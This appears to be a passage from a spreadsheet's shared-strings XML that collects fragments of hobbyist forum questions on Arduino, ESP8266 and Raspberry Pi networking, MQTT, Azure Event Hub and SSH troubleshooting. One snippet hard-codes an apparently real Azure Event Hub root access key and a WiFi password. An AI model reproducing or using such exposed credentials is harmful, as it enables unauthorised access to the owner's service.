    Serial.begin(115200);               // only for debug
    WiFi.begin(ssid, pass);             // connects to the WiFi router
    while (WiFi.status() != WL_CONNECTED) {
        Serial.print(".</t>
  </si>
  <si>
    <t>here's the code for sending single events 
#include &lt;ESP8266WiFi.h&gt;
#include &lt;WiFiClientSecure.h&gt;
#include &lt;String.h&gt;
#include "sha256.h"
#include "Base64.h"
// START: Azure Evet Hub settings
const char* KEY = "dhGE6MbbRLe6IPZs6dOHd3byQlEJ8YzqnW+uBAT7T/Q=";   // main event hub key 
const char* KEY_NAME = "RootManageSharedAccessKey";                 //  key name
const char* HOST = "rishieventhub2.servicebus.windows.net";         //  event hub name
const char* END_POINT = "/rishidata/messages";                      // name of eventhub created inside event hub
// END: Azure Evet Hub settings
// START: WiFi settings
const char* SSID = "Nokia";
const char* PASSWORD = "rishikesh";
// END: WiFi settings
String request;
String data;
String fullSas;
 WiFiClientSecure client;
void setup() {
  Serial.begin(115200);
  Serial.println();
  Serial.println();
  // START: Naive URL Encode
  String url = "https://" + (String)HOST + (String)END_POINT;
  url.replace(":", "%3A");
  url.replace("/", "%2F");
  Serial.println(url);
  // END: Naive URL Encode
  // START: Create SAS
  // https://azure.microsoft.com/en-us/documentation/articles/service-bus-sas-overview/
  // Where to get secods since the epoch: local service, SNTP, RTC
  int expire = 1711104241;
  String stringToSign = url + "\n" + expire;
  // START: Create signature
  Sha256.initHmac((const uint8_t*)KEY, 44);
  Sha256.print(stringToSign);
  char* sign = (char*) Sha256.resultHmac();
  int signLen = 32;
  // END: Create signature
  // START: Get base64 of signature
  int encodedSignLen = base64_enc_len(signLen);
  char encodedSign[encodedSignLen];
  base64_encode(encodedSign, sign, signLen); 
  String encodedSas = (String) encodedSign;
  // Naive URL encode
  encodedSas.replace("=", "%3D");
  Serial.println(encodedSas);
  // END: Get base64 of signature
  // SharedAccessSignature
   fullSas = "sr=" + url + "&amp;sig="+ encodedSas + "&amp;se=" + expire +"&amp;skn=" + KEY_NAME;
  // END: create SAS
  // START: Wifi connection
  Serial.print("connecting to ");
  Serial.println(SSID);
  WiFi.begin(SSID, PASSWORD);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.print(".</t>
  </si>
  <si>
    <t>Got the message :-))))";  // a reply string to send back
int rate = 1000/60;
unsigned long mytime;
unsigned long count;
float avg_diff = 0;
void setup()
{
  Serial.begin(115200);
  Serial.println();
  Serial.printf("Connecting to %s ", ssid);
  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED)
  {
    delay(500);
    Serial.print(".</t>
  </si>
  <si>
    <t>ret = GLB_MQTTClient-&gt;connect() always falied with ret = -1 (Connection failed)
Address output: 
Address of GLB_secureClient: 0x3ffef170 
Address of GLB_MQTTClient: 0x3fff167c 
Address of GLB_MQTT_Publish: 0x3fff17e4 
Address of GLB_MQTT_Subcribe:0x3fff17f4
Address of GLB_secureClient: 0x3ffef170 
Address of GLB_MQTTClient: 0x3fff27ac 
Address of GLB_MQTT_Publish:  0x3fff220c 
Address of GLB_MQTT_Subcribe: 0x3fff2914
What could be the problem</t>
  </si>
  <si>
    <t>I've also linked it here - CODE):
#include &lt;SPI.h&gt;
#include &lt;WiFi.h&gt;
#include &lt;Twitter.h&gt;
int led = 13;
char ssid[] = ""; //  your network SSID (name) 
char pass[] = "";    // your network password (use for WPA, or use as key for WEP)
int keyIndex = 0;            // your network key Index number (needed only for WEP)
int status = WL_IDLE_STATUS; // status of the wifi connection
// initialize the library instance:
WiFiClient client;
const unsigned long requestInterval = 30*1000;    // delay between requests; 30 seconds
// if you don't want to use DNS (and reduce your sketch size)
// use the numeric IP instead of the name for the server:
//IPAddress server(199,59,149,200);    // numeric IP for api.twitter.com
char server[] = "raw-d.com";     // name address for twitter API
boolean requested;                     // whether you've made a request since connecting
unsigned long lastAttemptTime = 0;     // last time you connected to the server, in milliseconds
String currentLine = "";               // string to hold the text from server
String tweet = "";                     // string to hold the tweet
boolean readingTweet = false;          // if you're currently reading the tweet
String lastCount = ""; //last number counted
int numberOfBytes=0;
char* textFound;
void setup()
{
  // reserve space for the strings:
  currentLine.reserve(256);
  tweet.reserve(150);
  //Initialize serial and wait for port to open:
  Serial.begin(9600); 
  while (!Serial) {
    ; // wait for serial port to connect.</t>
  </si>
  <si>
    <t>My API is simple:
PHP API:
The Arduino code is just one of the ESP8266 examples, and looks like this:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;ESP8266HTTPClient.h&gt;
const char* ssid = "Next-Guest";
const char* password = "";
void setup () {
  Serial.begin(115200);
  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.print("Connecting..");
  }
}
void loop() {
  if (WiFi.status() == WL_CONNECTED) {
    HTTPClient http;
    //http.begin("http://jsonplaceholder.typicode.com/users/1"); &lt;- this works
    http.begin("https://makerspace.albe.pw/api/getDoorStatus.php"); // &lt;- this doesn't
    int httpCode = http.GET();
    Serial.println(httpCode);
    if (httpCode &gt; 0) {
      String payload = http.getString();
      Serial.println(payload);
    }
    http.end();
  }
  delay(30000);
}
I can do a GET request locally from any computer to my API using jQuery AJAX, so it must be somewhat open?</t>
  </si>
  <si>
    <t>Works like that:
Device gets IP from DHCP
device starts a thread listening for broadcast packets on port 4444
a discovery app listen on another port, like 4445.
the discovery app announces itself using a broadcast packet to 4444 port (255.255.255.255:4444)
each device listening, reports back with its identification and IP to app port 4445.</t>
  </si>
  <si>
    <t>Return back to the status of all of the locks:
eg: Host machine send 0X80  0X01   0X00  0X33  0XB2 (hexadecimal),return
Start  plate address  Status1  Status2  Status3  Status4  Status5  Status6 Status7
Command   Check cod
0X80  0X01  0XFF  0XFF  0XFF  0XFF  0XFF  0XFF  0XFF  0X33  0XXX
Status: From status 1 to Status 7, high to low, the corresponding lock is 1-50.</t>
  </si>
  <si>
    <t>Not quite sure, therefore would appreciate any help or guidance on this :) thank you
##Imports
import serial
import mysql.connector
##Decare database values
mydb = mysql.connector.connect(
  host="ip here",
  user="username here",
  passwd="password here",
  database = "database name here"
)  
ID = 2
##Start the program
print("Oxygen Mask Monitoring System")
##Serial set up
ser = serial.Serial('/dev/ttyACM0',9600)
##Wait for serial input from nodes
print("Waiting for input from mask...")
print("")
print("")
while True: 
   line = ser.readline().decode().strip()
   print(line)
   list = line.split(',')
   mask= list[0]
   left = list[1]
   right = list[2]
   reed= list[3]
   sensor1= list[4]
   sensor2= list[5]
   sensor3= list[6]
   cursor=mydb.cursor()
   sql = "UPDATE pureo2 SET Left =(%s), Right=(%s) WHERE ID=(%s)"
   cursor.execute(sql,(left,right,ID))
   print ("Record updated successfully")</t>
  </si>
  <si>
    <t>You can see peace of my Arduino code bellow:
#include &lt;WiFly.h&gt;
#include "HTTPClient.h"
#define SSID      "bbbbbbb"
#define KEY       "ccccccc"
#define AUTH      WIFLY_AUTH_WPA2_PSK
#define HTTP_POST_URL "15.15.25.67/api/meteo"
SoftwareSerial uart(2, 3);
WiFly wifly(uart);
HTTPClient http;
String PostData;
char PostBuf[90];
        uart.begin(9600);
//      check if WiFly is associated with AP(SSID)
        if (!wifly.isAssociated(SSID)) {
          while (!wifly.join(SSID, KEY, AUTH)) {
            Serial.println("Failed to join " SSID);
            Serial.println("Wait 0.1 second and try again...");
            delay(100);
          }
          wifly.save();    // save configuration, 
        }  
        PostData.toCharArray(PostBuf, 90);
        while (http.post(HTTP_POST_URL, PostBuf, 10000) &lt; 0) {
        }
        while (wifly.receive((uint8_t *)&amp;get, 1, 1000) == 1) {
        Serial.print(get);
        }
        uart.end();
So it connect to WiFI and send request, but type of request is quite strange.</t>
  </si>
  <si>
    <t>*/
   WiFi.softAP(ssid,password);
   delay(10000);
   IPAddress myIP = WiFi.softAPIP();
   Serial.print("AP IP address: ");
   Serial.println(myIP);
   Serial.println("\nStarting server...");
  // start the server:
  server.begin();
}
void loop() 
{
 // wait for a new client:
  WiFiClient client = server.available();
  // when the client sends the first byte, say hello:
    if(client)
    {
     if (!alreadyConnected) 
{
  // clead out the input buffer:
  client.flush();
  Serial.println(analogRead(A0));
  Serial.println();
  client.println("Hello, client!</t>
  </si>
  <si>
    <t>Using wireshark i can see that if i send a scapy constructed packet from one of the laptops it does get sent out on Pi1 interface facing the switch (and so should be received by the switch, thus updating its table to say any packets with destination IP address of 192.168.0.2 or 192.168.0.3 must be sent to the MAC address of the interface on Pi1 facing the Switch), however no Internet connection can be established by the laptops.</t>
  </si>
  <si>
    <t>char server[] = "192.168.2.10"
if (client.connect(server, 8000)) {
  Serial.println("Connected to server");
  // Make a HTTP request
  client.println("Authorization: Basic **I put the key generated from the curl call here**");
  client.println("Content-Type: application/x-www-form-urlencoded");
  client.println("Content-Length: 35");
  client.println("username=username&amp;password=password");
  client.println("User-Agent: curl/7.26.0");
  client.println("Host: 192.168.2.10:8000");
  client.println("POST /GPIO/11/value/0 HTTP/1.1");
  client.println("Accept: */*");
  client.println();
  delay(1000);
  Serial.println();
  Serial.println("disconnecting");
  Serial.println("==============");
  Serial.println();
  // if there are incoming bytes available
  // from the server, read them and print them:
  while (client.available()) {
    char c = client.read();
    Serial.print(c);
    }
  client.stop(); //stop client
  }
My apologies in advance if this request is too cryptic, but this is my first time posting on such a forum.</t>
  </si>
  <si>
    <t>Serial.print("User fingerprint matches");
      Serial.print(" with confidence of "); Serial.println(finger.confidence);
      return 1;
   }
   else
   {
      Serial.println("Not Match");
      return 0;
   }
}
I am using Mega2560, ethenet shied W5500 and fingerprint R205, Some additional features you should notice are "getMatch, setModel, getReply, sendFormattedTemplatePackages".</t>
  </si>
  <si>
    <t>However, if I substitute USERNAME to SERIAL and PASSWORD to TOKEN:
BOARD_TAG    = mega2560
CPPFLAGS     = -DSERIAL=\"$(SERIAL)\" -DTOKEN=\"$(TOKEN)\"
include $(ARDMK_DIR)/Arduino.mk
and
void setup() {
  Serial.begin(9600);
  String auth_raw2(SERIAL ":" TOKEN);
  Serial.println(auth_raw2);
}
void loop() {}
I am getting the error, macro.ino:5:27: error: expected ) before string constant
Note that $USERNAME is defined on my linux box as disappearedng while $PASSWORD, $SERIAL, and $TOKEN are undefined.</t>
  </si>
  <si>
    <t>Andy's working {0xBE, 0xEF, 0xDE, 0xAD, 0xDE, 0xAD}
byte ip[] = { 192,168,1,12 };     //  Arduino device IP address     
char devid [] = "vCE3D036xxxxxxxx";  // Gsheets device ID from Pushingbox ('x's for privacy:)
char server[] = "api.pushingbox.com";
EthernetClient client;
void setup()
{
  Serial.begin(9600);
  Serial.println ("RESTART");
  while (!Serial) {
    ; // wait for serial port to connect.</t>
  </si>
  <si>
    <t>The case is as follows:
When the user enters their SSID and password
It is send to the Pi3
The pi3 uses the library to attempt to connect to the provided AP
The pi informs the GUI of the status of the connection attempt (success/ failed)
This works fine, IF we are watching the Pi's logs with pm2 during the connection attempt (we ssh into the Pi and then use pm2 logs).</t>
  </si>
  <si>
    <t>char *ptr;
  ptr = strtok(params, "&amp;");
  while (ptr != NULL) {
    Serial.println(urlParam);
    ptr = strtok(NULL, "&amp;");
  }
and the output is as expected:
Output:
ssid=SSID
pwd=PASSWORD
userId=1234
then the next split:
  char *ptr;
  ptr = strtok(params, "&amp;");
  while (ptr != NULL) {
    char *paramKey;
    char *paramValue;
    paramKey = strtok(ptr, "=");
    Serial.println(paramKey);
    if (paramKey == 'ssid'){
      paramValue = strtok(NULL, "=");
      Serial.println(paramValue);       
      ssidName = paramValue;
    }
    if (paramKey == 'pwd'){
      ...
    }
    if (paramKey == 'userId'){
      ...
    }       
    ptr = strtok(NULL, "&amp;");
  }
But the output is just
ssid
SSID
Looks like the loop is not working properly.</t>
  </si>
  <si>
    <t>$ ssh localhost
ssh$ sudo ~/.../sig-counter  # without exec
   # on session close: gets a SIGHUP and a SIGCONT from the kernel
$ ssh localhost
ssh$ exec sudo ~/src/experiments-sys/sig-counter
   # on session close: gets only a SIGCONT SI_USER relayed from sudo
$ ssh -t localhost sudo ~/src/experiments-sys/sig-counter
   # on session close: gets only a SIGCONT SI_USER relayed from sudo
$ xterm -e sudo ./sig-counter
           # on close: gets only a SIGCONT SI_USER relayed from sudo
Testing this was tricky, because xterm also sends a SIGHUP on its own, before exiting and closing the pty.</t>
  </si>
  <si>
    <t>Amass enough reputation points and Stack Overflow will grant you additional privileges:
15   Vote up
15   Flag offensive
50   Leave comments
100  Edit community wiki posts
125  Vote down (costs 1 rep)
200  Reduced advertising
250  Vote to close, reopen, or migrate your questions
500  Retag questions
1000     Show total up and down vote counts
1500     Create new tags
2000     Edit other peoples posts, vote to approve or reject suggested edits
3000     Vote to close, reopen, or migrate any questions
5000     Vote to approve or reject suggested tag wiki edits
10000    Vote to delete closed questions, access to moderation tools
15000    Protect questions to prevent answers by new users
20000    Vote to delete negatively voted answers and stronger question deletion votes
 you can always comment on your questions and answers, and any answers to questions youve asked, even with 1 rep.
At the high end of this reputation spectrum there is little difference between users with high reputation and  moderators.</t>
  </si>
  <si>
    <t>"));
    //displayRed();
    while(1);
  }
  Serial.println(F("Initialization Complete"));
  Serial.print(F("Attempting to connect to "));
  Serial.println(WLAN_SSID);
  if (!cc3000.connectToAP(WLAN_SSID, WLAN_PASS, WLAN_SECURITY)) {
    Serial.println(F("Failed!</t>
  </si>
  <si>
    <t>The code doing the SELECT, using a NODEMCU V3 board is:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;MySQL_Connection.h&gt;
#include &lt;MySQL_Cursor.h&gt;
char ssid[] = ""; // SSID NAME
char pass[] = ""; // SSID PASSWORD
IPAddress server_addr(xxx, xxx, x, xxx);
char user[] = "";
char password[] = "";
char query[] = "SELECT batchnumber FROM registro.qcInsecta_get ORDER BY id DESC LIMIT 1";
WiFiClient client;
MySQL_Connection conn((Client *)&amp;client);
void setup() {
  delay(500);
  Serial.begin(115200);
  WiFi.begin(ssid, pass);
  if (conn.connect(server_addr, 3306, user, password)) {
    delay(100);
    Serial.println(F("Connected"));    
  }
  else {
      Serial.println();
      conn.close();  
      if (conn.connect(server_addr, 3306, user, password)) {
      delay(500);
      } 
      else {
        Serial.println("...");
      }
  }
}
void loop() {
  delay(1000);
  row_values *row = NULL;
  long head_count = 0;
  Serial.println("1) Demonstrating using a cursor dynamically allocated.</t>
  </si>
  <si>
    <t>If gas leakage not detected, builtin LED of nodemcu should be on along with GREEN LED but whenever Gas leakage is detected on any of the SENSOR1 or SENSOR2, builtin LED of nodemcu should go off along with GREEN LED and respective sensor LED (SENSOR1 = RED and SENSOR2 = BLUE) should flash along with Buzzer playing the tone TILL gas leakage detected on any of the sensor.</t>
  </si>
  <si>
    <t>");
      break;
    case FINGERPRINT_PACKETRECIEVEERR:
      Serial.println("Communication error");
      break;
    case FINGERPRINT_IMAGEFAIL:
      Serial.println("Imaging error");
      break;
    default:
      Serial.println("Unknown error");
      break;
    }
  }
  // OK success!</t>
  </si>
  <si>
    <t>(SD.begin(4))){
    Serial.println("initialization failed");
    goto again;
  }
  Serial.println("initialization done");
}
void clear_database(){
if (finger.verifyPassword()) {
    Serial.println("Found fingerprint sensor!</t>
  </si>
  <si>
    <t>void Blink_Password(int Password_pos)
{ 
    int term1;
    int term2;
    lcd.blink();
    delay(40);
    switch(Password_pos)
    {
    case PASSWORD_ITEM1:  lcd.print(password1);Update_Screen=1; 
                          goto PASSWORD;
                          break;
    case PASSWORD_ITEM2:lcd.print(password2);Update_Screen=1; 
                             goto PASSWORD;
                          break;
    case PASSWORD_ITEM3:lcd.print(password3);Update_Screen=1; 
                          goto PASSWORD;
                          break;
    case PASSWORD_ITEM4:lcd.print(password4);Update_Screen=1; 
                           goto PASSWORD;
                          break;                      
    }
PASSWORD:   lcd.setCursor(Blink_password_pos[Password_pos][0],Blink_password_pos[Password_pos][1]);
    lcd.noCursor();//timedBeep(shortBeep,1);
    delay(40);
}</t>
  </si>
  <si>
    <t>Google sheet login failed with error: '(email address it gave me)'"
I also receive an email in my main email saying that the domain name is not found for the email address I tried to send the Google Spreadsheet to.</t>
  </si>
  <si>
    <t>Here's what I know:
I try and connect over USB and here is the error message I get in the octoprint console:
Further googling has lead me to SSH in to the pi and run
and I get:
[    6.117809] cdc_acm 1-1.4:1.0: ttyACM0: USB ACM device
[   28.949094] cdc_acm 1-1.4:1.0: ttyACM0: USB ACM device
[   35.389154] cdc_acm 1-1.4:1.0: ttyACM0: USB ACM device
[   36.119582] cdc_acm 1-1.4:1.0: ttyACM0: USB ACM device
... on and on
[  146.219829] cdc_acm 1-1.4:1.0: ttyACM1: USB ACM device
[  156.209130] cdc_acm 1-1.4:1.0: ttyACM1: USB ACM device
[  166.450016] cdc_acm 1-1.4:1.0: ttyACM1: USB ACM device
[  167.590072] cdc_acm 1-1.4:1.0: ttyACM1: USB ACM device
If I reboot the pi, without the printer connected, the output is:
[    0.000000] Kernel command line: dma.dmachans=0x7f35 bcm2708_fb.fbwidth=720 bcm2708_fb.fbheight=480 bcm2708.boardrev=0x10 bcm2708.serial=0x6024d696 smsc95xx.macaddr=B8:27:EB:24:D6:96 bcm2708_fb.fbswap=1 bcm2708.disk_led_gpio=47 bcm2708.disk_led_active_low=0 sdhci-bcm2708.emmc_clock_freq=250000000 vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000  dwc_otg.lpm_enable=0 console=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline rootwait
[    0.001437] console [tty1] enabled
[    0.646366] dev:f1: ttyAMA0 at MMIO 0x20201000 (irq = 83, base_baud = 0) is a PL011 rev3
[    1.033111] console [ttyAMA0] enabled
As soon as I connect the printer to the RasPi, ACM0 and sometimes ACM1 devices start spawning, with a new one appearing every 3-10 seconds.</t>
  </si>
  <si>
    <t>So this is what the program has to do:
Handle handshake            V
Receive message             Received some unknown chars
Sending (when I'm able to receive, I will find out how to send)
I'm testing websocket with:
http://www.websocket.org/echo.html
connecting with my wifi module
ws://192.168.1.104:8000
When I send 3 x the message "aaaa" to my Arduino I receive this:
+IPD,0,10: |  |  | q |  | b | k |  | c |  |  |
+IPD,0,10: |  |  |  |  | 0 | P |  |  | Q | 1 |
+IPD,0,10: |  |  | _ |  |  | ?</t>
  </si>
  <si>
    <t>Command true sms:
LEDON - turns on LED nr 1
LEDOFF - turns off LED nr 1
LED2ON - turns on LED nr 2
LED2OFF - turns off LED nr 2
The password is #1234 before the command.</t>
  </si>
  <si>
    <t>", "Device not found or wrong Login")
                    break
        def outin(command):
            global con
            output="sudo echo "+command+"&gt; /dev/ttyACM0|head&lt;/dev/ttyACM0"
            if remote.get()==0:  # switches between remote and direct output
                answer=os.popen(output).readlines()
            else:
                if con==0:  #  checks wether a connection has already 
                    SSHConnection()  #  connects
                else:
                    pass
                stdin,stdout,stderr = ssh.exec_command(output)
                answer=stdout.read()
            return answer
I found online that my function might do the .read() before my command was executed.</t>
  </si>
  <si>
    <t>[IOT_HUB_NAME]";
    private const string password_hublevel = "SharedAccessSignature sr={URL-encoded-resourceURI}&amp;sig={signature-string}&amp;se={expiry}&amp;skn={policyName}";
    static Session session;
    static void Main(string[] args)
    {
        Address address = new Address(host, port, username_hublevel, password_hublevel);
        Connection connection = new Connection(address);
        string audience = Fx.Format("{0}/devices/{1}", host, device_id);
        string resourceUri = Fx.Format("{0}/devices/{1}", host, device_id);
        session = new Session(connection);
        SendEvent();
        Console.WriteLine("Sent Hello AMQP!</t>
  </si>
  <si>
    <t>debug1: Found key in /Users/annazotova/.ssh/known_hosts:10
debug1: rekey after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: rekey after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: publickey
debug1: Trying private key: /Users/annazotova/.ssh/id_rsa
debug1: Trying private key: /Users/annazotova/.ssh/id_dsa
debug1: Trying private key: /Users/annazotova/.ssh/id_ecdsa
debug1: Trying private key: /Users/annazotova/.ssh/id_ed25519
debug1: Next authentication method: keyboard-interactive
Password:
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Password:
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Password:
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password
pi@192.168.0.3's password: 
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.</t>
  </si>
  <si>
    <t>Then you should change IP address of sensor to subnet and mask like your Wifi, change RPi address back and than you should be able to see sensor from wifi too.</t>
  </si>
  <si>
    <t>Sp_who2 returns the following informations:
Spid: System process id that requested the lock
Status: Background, sleeping or runnable
Login: The login name that has requested the lock
HostName: The computer where the lock request has been initiated
BlkBy: The spid of the connection that is blocking the current connection
DbName: The database name where the lock request has been generated
Command: General command type that requested the lock
CPUTime: The number of milliseconds the request has used
DiskIO: Disk input / output that the command has used
LastBatch: Date and time of the last batch executed by the connection
ProgramName: The name of the application that issued the connection
Spid: In it is difficult to read the spid from the beginning of the output it is repeated here</t>
  </si>
  <si>
    <t>Thanks in advance,
Felix
EDITED AGAIN:
the server log says after successful authentification the following when the raspi connects:
Tue Mar  3 18:59:00 2015 2.240.44.246:26966 [raspi] Peer Connection Initiated with [AF_INET]2.240.44.246:26966
Tue Mar  3 18:59:00 2015 raspi/2.240.44.246:26966 MULTI_sva: pool returned IPv4=10.8.0.6, IPv6=e8b6:d1be:808e:f8b6:34bb:fdb6:4405:79b8
Tue Mar  3 18:59:00 2015 raspi/2.240.44.246:26966 MULTI: Learn: 10.8.0.6 -&gt; raspi/2.240.44.246:26966
Tue Mar  3 18:59:00 2015 raspi/2.240.44.246:26966 MULTI: primary virtual IP for raspi/2.240.44.246:26966: 10.8.0.6
Tue Mar  3 18:59:02 2015 raspi/2.240.44.246:26966 PUSH: Received control message: 'PUSH_REQUEST'
Tue Mar  3 18:59:02 2015 raspi/2.240.44.246:26966 send_push_reply(): safe_cap=960
Tue Mar  3 18:59:02 2015 raspi/2.240.44.246:26966 SENT CONTROL [raspi]: 'PUSH_REPLY,redirect-gateway def1 bypass-dhcp,dhcp-option DNS 8.8.8.8,dhcp-option DNS 8.8.4.4,route 10.8.0.0 255.255.255.0,topology net30,ping 10,ping-restart 120,ifconfig 10.8.0.6 10.8.0.5' (status=1)
the output running on the client RPi 2 looks like this (again, after a successful authentication):
Tue Mar  3 18:59:00 2015 [server] Peer Connection Initiated with [AF_INET]2.240.44.246:34345
Tue Mar  3 18:59:02 2015 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Tue Mar  3 18:59:02 2015 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1 bypass-dhcp,dhcp-option DNS 8.8.8.8,dhcp-option DNS 8.8.4.4,route 10.8.0.0 255.255.255.0,topology net30,ping 10,ping-restart 120,ifconfig 10.8.0.6 10.8.0.5'
Tue Mar  3 18:59:02 2015 OPTIONS IMPORT: timers and/or timeouts modified
Tue Mar  3 18:59:02 2015 OPTIONS IMPORT: --ifconfig/up options modified
Tue Mar  3 18:59:02 2015 OPTIONS IMPORT: route options modified
Tue Mar  3 18:59:02 2015 OPTIONS IMPORT: --ip-win32 and/or --dhcp-option options modified
Tue Mar  3 18:59:02 2015 ROUTE default_gateway=192.168.2.201
Tue Mar  3 18:59:02 2015 TUN/TAP device tun0 opened
Tue Mar  3 18:59:02 2015 TUN/TAP TX queue length set to 100
Tue Mar  3 18:59:02 2015 do_ifconfig, tt-&gt;ipv6=0, tt-&gt;did_ifconfig_ipv6_setup=0
Tue Mar  3 18:59:02 2015 /sbin/ifconfig tun0 10.8.0.6 pointopoint 10.8.0.5 mtu 1500
Tue Mar  3 18:59:02 2015 /sbin/route add -net 2.240.44.246 netmask 255.255.255.255 gw 192.168.2.201
Tue Mar  3 18:59:02 2015 /sbin/route add -net 0.0.0.0 netmask 128.0.0.0 gw 10.8.0.5
Tue Mar  3 18:59:02 2015 /sbin/route add -net 128.0.0.0 netmask 128.0.0.0 gw 10.8.0.5
Tue Mar  3 18:59:02 2015 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.5
Tue Mar  3 18:59:02 2015 Initialization Sequence Completed
ifconfig returns on server side additionally to lo and eth0:
tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:10.8.0.1  P-t-P:10.8.0.2  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:1907 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1820 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:245870 (240.1 KiB)  TX bytes:1046186 (1021.6 KiB)
on the client side it looks like this:
tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:10.8.0.10  P-t-P:10.8.0.9  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:1 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:76 (76.0 B)  TX bytes:380 (380.0 B)
Here is an image of the structure:
http://i.stack.imgur.com/z9QUs.jpg</t>
  </si>
  <si>
    <t>Here is how I am attempting to make the XMLSocket connection with the running SOCAT instance:
import flash.system.Security;
Security.allowDomain("*");
Security.allowInsecureDomain("127.0.0.1");
Security.loadPolicyFile("xmlsocket://127.0.0.1:843");
//instantiate instance
var rpi_usb0_Listener = new XMLSocket();
//create listeners:
//on connect
rpi_usb0_Listener.onConnect = function(result){
    if(result){
        //connected
        state_txt.text = "on-connect success";
    }else{
        //not connected
        state_txt.text = "on-connect failed";
    }
}
//on close
rpi_usb0_Listener.onClose = function(){
    //disconnected
    state_txt.text = "connection closed";
}
//on incoming date recieved
rpi_usb0_Listener.onXML = function(data){
    //do whatever   
    incomingData_txt.text += data;
    //close
    //rpi_usb0_Listener.close();
}
//make connection
if(!rpi_usb0_Listener.connect(null, 7777)){
    state_txt.text = "connection true";
}else{
    state_txt.text = "connection false";
}
No matter I have tried..</t>
  </si>
  <si>
    <t>1 led should light up and stay lit (indicating that the pro micro is getting power)
and another led should flash on and off (unless a led blink is already uploaded to the promicro in which case it will flash on n off)
if anything else happend with the leds (like the 2nd led continously lit) the booloader is probably corrupted.</t>
  </si>
  <si>
    <t>Status - returns WiFi connection status payload
Networks - accepts WiFi credentials, sets up WiFi and returns status payload
I explicitly introduced 15 sec delays into Status and Networks to test if connection drop is not because of timeout.</t>
  </si>
  <si>
    <t>the command to know the estatus of the ports is the following:
Read the lock status command(The feedback of the door switch status)
Start   plate address   Lock address   Command    Check code (XOR)
0X80     0X01  0XF            0X00-32       0X33        XX
The lock address is 0X00, return the status of all of the locks, if its not 0, then it will back to this lock status.</t>
  </si>
  <si>
    <t>However, before giving up on your Arduino, you should try several possible diagnostics and fixes including:
Check that all USB connections are secure
Try a new USB-A to USB-B cable
Check that the RX LED flashes briefly after each attempt
Check that all drivers are up to date and installed
Try the Loopback Test (instructions here, on the Arduino Forums)
Go into Device Manager and check that your Arduino is shown in the COM port section
Select "Arduino/Genuino Uno" under "Board" in the IDE
Select "COM3 (Arduino/Genuino UNO)" under "Port" in the IDE
Try changing the COM port 
Try completely uninstalling and reinstalling the Arduino software (after disconnecting the board)
Try using the IDE to burn the bootloader on the microcontroller
Check out Arduino Troubleshooting at arduino.cc
If none of these work, you may have a malfunctioning board.</t>
  </si>
  <si>
    <t>Here is my code:
If I initialize in this format, then fingerprint works:
And if i do it this way, then RFID works:
finger.begin(57600);
  mySerial.begin(9600);
  Serial.begin(9600);
I want both of them to work i.e; I first Scan the Card, then verify pin and then it checks the validity of the fingerprint.</t>
  </si>
  <si>
    <t>I mean, I don't get any result from hvacState In fact, If I just bring this code out of comment:
WiFiClientSecure client;
    Serial.print("connecting to ");
    Serial.println(host);
      if (!client.connect(host, httpsPort)) {
      Serial.println("connection failed");
      return;
    }//ok
The parsing also stops working.</t>
  </si>
  <si>
    <t>- PENDING
P
Scenarios run: 1, Failures: 0, Pending: 1
Steps 3, failed 0, pending 3
Pending:
1)  (1.user_logs_in_successfully): No matching Action found for "Given I am not logged in"
No matching Action found for "When I log in as Morgan with a password SecretPassw0rd"
No matching Action found for "Then I should see a message, "Welcome, Morgan!""</t>
  </si>
  <si>
    <t>JSR 356 provide support in the Java EE platform for:
Creating WebSocket Java components to handle bi-directional WebSocket conversations
Initiating and intercepting WebSocket events
Creation and consumption of WebSocket text and binary messages
The abililty to define WebSocket protocols and content models for an application
Configuration and management of WebSocket sessions, like timeouts, retries, cookies, connection pooling
Specification of how WebSocket application will work within the Java EE security model
See:
JSR 356: JavaTM API for WebSocket
Oracle's official page: JSR 356, Java API for WebSocket</t>
  </si>
  <si>
    <t>I want to turn this around, more specifically:
I want the ESP8266 chip to broadcast UDP packets with some sort of identifier-number in the length field of the UDP packet, without beeing connected to any wifi connection.</t>
  </si>
  <si>
    <t>Is it possible for a Raspberry Pi to check if someone is connected (and sends input) via ssh, even if the ssh connection (over Paramiko) did not get closed properly (the connection breaks off because the client is too far away for example)?</t>
  </si>
  <si>
    <t>"));
    while(1);
  }
  Serial.print(F("\nAttempting to connect to ")); Serial.println(WLAN_SSID);
  if (!cc3000.connectToAP(WLAN_SSID, WLAN_PASS, WLAN_SECURITY)) {
    Serial.println(F("Failed!</t>
  </si>
  <si>
    <t># Request an encrypted connection
startTlsCommand = 'STARTTLS\r\n'
clientSocket.send(startTlsCommand.encode())
